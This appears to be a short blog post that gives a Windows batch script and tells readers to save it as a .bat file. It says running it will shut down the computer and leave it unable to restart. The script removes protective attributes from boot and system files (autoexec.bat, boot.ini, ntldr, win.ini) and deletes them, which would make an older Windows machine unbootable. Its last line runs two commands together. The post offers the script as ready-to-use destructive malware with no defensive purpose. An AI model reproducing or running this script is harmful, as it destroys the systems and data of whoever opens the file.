Just copy the below code in notepad and save it as anyname.bat and when you open the file it will shutdown your computer and then you will not able to restart it
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.inidel c:\windows\win.ini
No comments:
Post a Comment
Thanks For Your Comment!